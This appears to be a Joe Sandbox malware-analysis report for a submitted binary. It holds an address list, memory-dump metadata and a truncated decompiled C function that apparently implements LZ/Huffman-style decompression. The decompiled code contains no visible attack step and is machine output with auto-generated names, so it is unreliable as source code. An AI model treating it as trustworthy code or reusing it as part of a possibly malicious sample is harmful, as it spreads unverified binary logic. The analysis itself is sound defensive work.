0x00e76601
0x00e76604
0x00e76607
0x00000000
0x00000000
0x00e7660d
0x00e76610
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00e75eb8
0x00000000
0x00e75eb8
0x00e75eb8
0x00e7656e
0x00e76570
0x00e76570
0x00e76573
0x00e76577
0x00e76579
0x00e76579
0x00e7657d
0x00e76582
0x00e76585
0x00e76588
0x00e7658b
0x00e7658e
0x00e7658e
0x00e7658e
0x00e76593
0x00e76593
0x00000000
0x00e76593
0x00e76521
0x00e76523
0x00e76524
0x00e76526
0x00000000
0x00000000
0x00e76528
0x00e7652a
0x00e7652a
0x00e7652d
0x00e7652d
0x00e7652f
0x00e76531
0x00e76537
0x00e7653d
0x00e76543
0x00e76549
0x00e7654f
0x00e76555
0x00e76558
0x00e7655b
0x00e7655d
0x00e76560
0x00e76562
0x00e76562
0x00e76562
0x00000000
0x00e76567
0x00e764d5
0x00e764d5
0x00e764de
0x00e764df
0x00000000
0x00e764df
0x00e7648d
0x00e76494
0x00e76499
0x00e76499
0x00000000
0x00e75eb8
0x00e76773
0x00e766c9
0x00e766cf
0x00e766d2
0x00e766d2
0x00e766d2
0x00e766d4
0x00000000
0x00000000
0x00e766d6
0x00e766d6
0x00e766d7
0x00e766da
0x00e766dd
0x00000000
0x00000000
0x00e766df
0x00000000
0x00e766df
0x00e766e1
0x00e766e1
0x00000000
0x00e766e1
0x00e76697
0x00e76699
0x00e7669c
0x00e766a6
0x00e766ae
0x00e766b4
0x00e766b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00e76669
0x00e76669
0x00e7666c
0x00e7666e
0x00e76671
0x00e76671
0x00e76671
0x00000000
0x00e76669
0x00e764be
0x00e764be
0x00e764c1
0x00e764c4
0x00e764c4
0x00e7647c
0x00e76482
0x00e76484
0x00e76489
0x00e7648b
0x00000000
0x00000000
0x00000000
0x00e7648b
0x00e7607e
0x00e7607e
0x00e76084
0x00e76087
0x00e76098
0x00e7609b
0x00e7609b
0x00e76089
0x00e76089
0x00e76089
0x00e7609d
0x00e760a0
0x00e760a2
0x00e760a6
0x00e760ad
0x00e760b5
0x00e760b7
0x00e760be
0x00e760c1
0x00e760c1
0x00e760c4
0x00e760c4
0x00e760c9
0x00e760d0
0x00e760d6
0x00e760dc
0x00e760e3
0x00e7610f
0x00e76111
0x00e76112
0x00e76113
0x00e76115
0x00e76131
0x00e76134
0x00e7613b
0x00e7613e
0x00e76141
0x00e7614d
0x00e76159
0x00e7615b
0x00e76161
0x00e76163
0x00e76163
0x00e76165
0x00000000
0x00e76165
0x00e76117
0x00e7611d
0x00e76120
0x00e76120
0x00e76120
0x00e76122
0x00000000
0x00000000
0x00e76124
0x00e76124
0x00e76125
0x00e76128
0x00e7612b
0x00000000
0x00000000
0x00e7612d
0x00000000
0x00e7612d
0x00e7612f
0x00e7612f
0x00000000
0x00e760e5
0x00e760e5
0x00e760e7
0x00e760ea
0x00e760f4
0x00e760fc
0x00e76102
0x00e76105
0x00e7616d
0x00e7616d
0x00e76170
0x00e76173
0x00e76183
0x00e76186
0x00e76186
0x00e76175
0x00e76175
0x00e76175
0x00e76188
0x00e76189
0x00e7618d
0x00e7618f
0x00e76193
0x00e76195
0x00e76289
0x00e76289
0x00000000
0x00e7619b
0x00e7619b
0x00e7619b
0x00e7619e
0x00e762e4
0x00e762e7
0x00e762f0
0x00e762f8
0x00e762fc
0x00e76300
0x00e76307
0x00e7630a
0x00e76310
0x00e7628c
0x00e7628c
0x00e76292
0x00e76294
0x00e76295
0x00e7629b
0x00e7629d
0x00e7629e
0x00e762a4
0x00e762a6
0x00e762a6
0x00e762a6
0x00e762a4
0x00e7629b
0x00e762aa
0x00e762b0
0x00e762b6
0x00e762b9
0x00e762bc
0x00e762c3
0x00e762c6
0x00e76318
0x00e7631e
0x00e76321
0x00e76323
0x00e7632a
0x00e7632c
0x00e7632e
0x00e7643a
0x00e7643a
0x00e7643c
0x00000000
0x00000000
0x00e76442
0x00e76442
0x00e76448
0x00e76448
0x00e7644e
0x00e76453
0x00e76457
0x00e7645a
0x00e7645f
0x00e76468
0x00e7646a
0x00e7646a
0x00e7646a
0x00000000
0x00e7646f
0x00e76334
0x00e76334
0x00e76336
0x00000000
0x00000000
0x00e7633c
0x00e7633c
0x00e76342
0x00e76345
0x00e7634b
0x00e7634d
0x00e76351
0x00e7639c
0x00e7639c
0x00e7639f
0x00e763ce
0x00e763ce
0x00e763d0
0x00e763d8
0x00e763db
0x00e763de
0x00e763e7
0x00e763ea
0x00e763ed
0x00e763f6
0x00e763f9
0x00e763fc
0x00e76405
0x00e76408
0x00e7640b
0x00e76414
0x00e76417
0x00e7641a
0x00e76423
0x00e76426
0x00e76429
0x00e76432
0x00e76432
0x00e76429
0x00e7641a
0x00e7640b
0x00e763fc
0x00e763ed
0x00e763de
0x00000000
0x00e763d0
0x00e763a1
0x00e763a3
0x00e763a3
0x00e763a6
0x00e763aa
0x00e763ac
0x00e763ac
0x00e763b0
0x00e763b5
0x00e763b8
0x00e763bb
0x00e763be
0x00e763c1
0x00e763c1
0x00e763c1
0x00e763c6
0x00e763ca
0x00000000
0x00e763ca
0x00e76353
0x00e76353
0x00e76356
0x00000000
0x00000000
0x00e76358
0x00e7635a
0x00e7635a
0x00e7635d
0x00e7635d
0x00e7635f
0x00e76362
0x00e76368
0x00e7636e
0x00e76374
0x00e7637a
0x00e76380
0x00e76386
0x00e76389
0x00e7638c
0x00e7638f
0x00e76392
0x00e76395
0x00e76395
0x00e76395
0x00000000
0x00e762c8
0x00e762c8
0x00e762c8
0x00e762d1
0x00e762d2
0x00000000
0x00e762d2
0x00e762c6
0x00e761a4
0x00e761a4
0x00e761d7
0x00e761a6
0x00e761a9
0x00e761b2
0x00e761ba
0x00e761bd
0x00e761c5
0x00e761cc
0x00e761d2
0x00e761d2
0x00e761dc
0x00e761e3
0x00e761e9
0x00e761ef
0x00e761f6
0x00e76222
0x00e76224
0x00e76225
0x00e76226
0x00e76228
0x00e76244
0x00e76247
0x00e7624e
0x00e76251
0x00e76254
0x00e76260
0x00e7626c
0x00e7626e
0x00e76274
0x00e76276
0x00e76276
0x00e76278
0x00000000
0x00e76278
0x00e7622a
0x00e76230
0x00e76233
0x00e76233
0x00e76233
0x00e76235
0x00000000
0x00000000
0x00e76237
0x00e76237
0x00e76238
0x00e7623b
0x00e7623e
0x00000000
0x00000000
0x00e76240
0x00000000
0x00e76240
0x00e76242
0x00e76242
0x00000000
0x00e761f8
0x00e761f8
0x00e761fa
0x00e761fd
0x00e76207
0x00e7620f
0x00e76215
0x00e76218
0x00e76280
0x00e76283
0x00e76283
0x00e76285
0x00000000
0x00e76285
0x00e761f6
0x00e76195
0x00e760e3
0x00e76038
0x00e76038
0x00e7603f
0x00e7605d
0x00e76063
0x00e76068
0x00e7606b
0x00000000
0x00e7606b
0x00e76041
0x00e7604e
0x00e76056
0x00000000
0x00e76056
0x00e75fa9
0x00e75f4f
0x00e75f4f
0x00e75f51
0x00000000
0x00000000
0x00e75f53
0x00e75f55
0x00e75f5a
0x00e75f60
0x00e75f66
0x00000000
0x00000000
0x00e75f6c
0x00e75f6c
0x00e75f80
0x00e75f80
0x00e75f87
0x00e7687b
0x00e7687b
0x00000000
0x00e7687b
0x00000000
0x00e75f87
0x00e75f6e
0x00e75f6e
0x00e75f74
0x00e75f7a
0x00000000
0x00000000
0x00000000
0x00e75f7a
0x00e75ebb

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47fe8b68d85eb5d17935bfec2f030431fd039ced6a7f16b8f26ca7e07dbe69ab
Instruction ID: 996026a702c71b59e110a96e17b3d9bb44ebe48c018f6baeb87bc45f2ab91c16
Opcode Fuzzy Hash: 47fe8b68d85eb5d17935bfec2f030431fd039ced6a7f16b8f26ca7e07dbe69ab
Instruction Fuzzy Hash: 38622771604B859FCB29CF78C8906B9BBE1AF55308F08D96ED8AE9B346D730E945C710

Uniqueness

Uniqueness Score: -1.00%

Function 00E772FF Relevance: .8, Instructions: 773
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00E772FF(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E00E6A9F3(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E00E6A9F3(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E00E6A9F3(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E00E7F750(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E00E7F750(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E00E73B93(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E00E7207E(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E00E6A9F3(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E00E6A9F3(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
